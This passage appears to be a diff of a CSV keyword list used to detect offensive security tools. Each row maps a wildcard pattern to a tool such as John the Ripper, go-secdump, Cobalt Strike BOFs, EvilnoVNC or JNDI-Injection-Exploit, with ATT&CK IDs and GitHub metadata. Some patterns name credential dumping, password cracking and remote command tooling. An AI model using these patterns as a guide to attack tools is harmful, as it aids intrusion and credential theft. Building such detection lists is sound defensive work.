Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*java/jndi/LDAPRefServer.java*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*java-deserialization-exploits*","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","583","262","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z" +"*javascript-obfuscator*","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","11763","1384","2023-09-05T17:32:26Z","2016-05-09T08:16:53Z" +"*jboss_jmx_upload_exploit*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*jdk*-activator-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-call-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-dgc-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-method-rce-test.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*jdk*-reg-bypass.txt*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*jdwp-shellifier.py -t * -p * --cmd *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*jedisct1*","offensive_tool_keyword","Github Username","github username. a knack for cryptography. computer vision. opensource software and infosec. hosting infosec tools used by pentester","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/jedisct1","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*jfjallid/go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*jfjallid/go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*JGillam/burp-co2*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*Jira-Lens.py*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" -"*jmmcatee/cracklord*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" +"*jmmcatee/cracklord*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*JMousqueton/PoC-CVE-2022-30190*","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","2","149","58","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z" -"*jndi_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*JNDI-Injection-Exploit*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*jndi_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*JNDI-Injection-Exploit*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*Job killed and console drained*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*JoelGMSec/EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z" +"*JoelGMSec/EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" "*JoelGMSec/PSRansom*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z" "*Joey is the best hacker in Hackers*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*john * --incremental*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john * -w=*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john * --wordlist=*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-groups*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *htdigest*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-inc *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-incremental *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-shells*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-show*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-single*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-users*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *-wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john *--wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john * --incremental*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john * -w=*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john * --wordlist=*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-groups*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *htdigest*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-inc *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-incremental *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-shells*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-show*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-single*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-users*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *-wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john *--wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*john --format=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*john hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john NTDS.dit*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john --show *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john --status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*John the Ripper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john NTDS.dit*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --show *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*John the Ripper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*john --wordlist=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*John*the*Ripper*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john.bash_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john.session.log*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john.zsh_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*John*the*Ripper*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.bash_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.session.log*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.zsh_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*john/password.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*john/run/fuzz.dic*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john/src/ztex/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john/run/fuzz.dic*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john/src/ztex/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*john@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*john_crack_asrep*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*john_crack_kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john_mpi.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 